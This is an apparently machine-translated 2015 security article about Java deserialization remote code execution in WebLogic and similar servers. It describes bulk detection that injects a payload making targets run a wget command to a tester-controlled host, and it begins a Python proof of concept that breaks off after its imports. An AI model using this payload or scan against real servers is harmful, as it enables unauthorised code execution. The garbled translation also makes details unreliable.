Java deserialization vulnerability batch testing-vulnerability warning-the black bar safety net

ID MYHACK58:62201569328
Type myhack58
Reporter 魔方安全团队‍
Modified 2015-11-24T00:00:00


! Foreword Java de-serialization vulnerabilities appear in people's field of vision has been for some time, the Rubik's Cube security team about this vulnerability were reproduced, while the study shows a high accuracy of mass detection the idea here with all of you a safe circle of friends to share. Background 2 0 1 5 year 1 1 November 6, FoxGlove security team@breenmachine posted a blog introduce how to use Java deserialization vulnerability to attack the latest version of WebLogic, WebSphere, JBoss, Jenkins, the OpenNMS these famous Java application, to achieve remote code execution. In fact, as early as in 2 0 1 5-year 1-month 2, No. 8, foreign security researcher Gabriel Lawrence and Chris Frohoff in AppSecCali on gives a report, which has been It was pointed out that Java deserialization vulnerability you can use Apache Commons Collections this commonly used Java library to achieve arbitrary code execution. Java reverse sequence vulnerability profile Serialization is to put the object into a byte stream for storage in memory, files, database; deserialize i.e., the inverse process, by the byte stream is reduced to the corresponding image. Java ObjectOutputStream class's writeObject()method can be implemented serialization, the class ObjectInputStream class readObject()method is used for deserialization. The following is the string object is first serialized, and stored to a local file, and then through the deserialization to restore the sample code: public static void main(String args[]) throws Exception { String obj = "hello world!"; // The serialized object is written to the file object. db FileOutputStream fos = new FileOutputStream("object. db"); ObjectOutputStream os = new ObjectOutputStream(fos); os. writeObject(obj); os. close(); // From the file object. the db read the data FileInputStream fis = new FileInputStream("object. db"); ObjectInputStream ois = new ObjectInputStream(fis); // By deserializing the recovered object obj, String obj2 = (String)ois. the readObject(); ois. close(); } The problem is that, if the Java application on the user input, i.e., the untrusted data to do the deserialization process, then the attacker can construct a malicious input, and allows deserialization to produce a non-desired object, the non-expected object in the generated process it is possible to bring arbitrary code execution. So the root of the problem lies in the class ObjectInputStream during the deserialization, not to the generated object type Limit; if deserialization can set the Java type to the white list, then the question of impact is a lot smaller. This article for the vulnerability of the principle will not be described in detail, with reference to the long kiosk technology in 1 1 the beginning released for the vulnerability of the detailed principle description: Lib's? Java deserialization vulnerability the General use of the analysis Vulnerability detection Detection Tool The vulnerability of using the method currently have there type of tool, including foreign researchers, prepared ysoserial, the 以及 国内 研究者 编写 的 serial.jar to generate the attack payload is. Detection ideas Topology: ! Due to the current to said temporarily not found to be directly echoing the results of the method, a simple detection packet returns the result cannot be very precise to find out whether the vulnerability exists, so we use a combination of third-party way to bulk check, the detection server sends a payload to the testing host, the monitored host to perform a remote command to access the test server to open Web service, log on to the test server to see the test server's Web Access log log, confirmed by the detection the host IP address in a log file on the test server logs exist on the monitored host's IP address, you can confirm by monitoring the host execution of the command, the presence of the vulnerability. This test to use the most of Weblogic, for example, use the tool to generate the payload ,the payload in the executed command is wget http://x.x.x.x/libreversex.html Wherein x. x. x. x is our set up for accepting the wget command to test the IP of the server ! And then use the foreign POC to be modified, in the code behind added the remote reading server logs and match the logs whether the presence of the IP address, wherein the Read target server access logs, we use a trick, i.e. the target server's Web Access log, make a hard link to a Web directory, so you can remote directly read the Web log for comparison, to confirm the IP if there is a security vulnerability: ! Run results: ! In the batch testing process, we found that is not to say that there are only 7 0 0 1 The existence of the security vulnerability, part of the site 8 0 Port also the vulnerability exists, because as long as it is to accept T3 Protocol port are the presence of the security vulnerability. Detection method summary Advantages: The detection method directly by executing the command mode and view the execution results for detecting, with high accuracy. Disadvantages: 1. If the network firewall is prohibited inside the host active access to the outside, is not successfully detected, and therefore the presence of false negatives may be. 2. For windows host, since the free wget command, you cannot use this way of detection. Detection test code The following is the WebLogic POC, using the BBT frame:

!/ usr/bin/env python


import socket import sys import requests import base64 import string import urlparse import os import time import requests

from baseframe import BaseFrame

class MyPoc(BaseFrame): poc_info = {

poc related information

[1] [2] [3] [4] next